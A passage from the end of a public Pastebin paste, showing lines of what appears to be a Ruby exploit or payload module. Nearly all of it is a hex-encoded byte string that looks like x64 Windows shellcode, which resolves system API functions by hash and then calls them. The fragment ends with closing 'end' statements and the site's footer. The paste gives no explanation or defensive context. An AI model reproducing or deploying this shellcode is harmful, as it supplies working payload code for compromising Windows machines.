  689. "\xC1\xC9\x0D\x41\x01\xC1\xE2\xEE\x45\x39\xD9\x75\xDA\x4C\x8B\x7A" +
  690. "\x20\xC3\x4C\x89\xF8\x41\x51\x41\x50\x52\x51\x56\x48\x89\xC2\x8B" +
  691. "\x42\x3C\x48\x01\xD0\x8B\x80\x88\x00\x00\x00\x48\x01\xD0\x50\x8B" +
  692. "\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\x48\xFF\xC9\x41\x8B\x34\x88" +
  693. "\x48\x01\xD6\xE8\x78\xFF\xFF\xFF\x45\x39\xD9\x75\xEC\x58\x44\x8B" +
  694. "\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01" +
  695. "\xD0\x41\x8B\x04\x88\x48\x01\xD0\x5E\x59\x5A\x41\x58\x41\x59\x41" +
  696. "\x5B\x41\x53\xFF\xE0\x56\x41\x57\x55\x48\x89\xE5\x48\x83\xEC\x20" +
  697. "\x41\xBB\xDA\x16\xAF\x92\xE8\x4D\xFF\xFF\xFF\x31\xC9\x51\x51\x51" +
  698. "\x51\x41\x59\x4C\x8D\x05\x1A\x00\x00\x00\x5A\x48\x83\xEC\x20\x41" +
  699. "\xBB\x46\x45\x1B\x22\xE8\x68\xFF\xFF\xFF\x48\x89\xEC\x5D\x41\x5F" +
  700. "\x5E\xC3"
  701. end
  702.  
  703. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!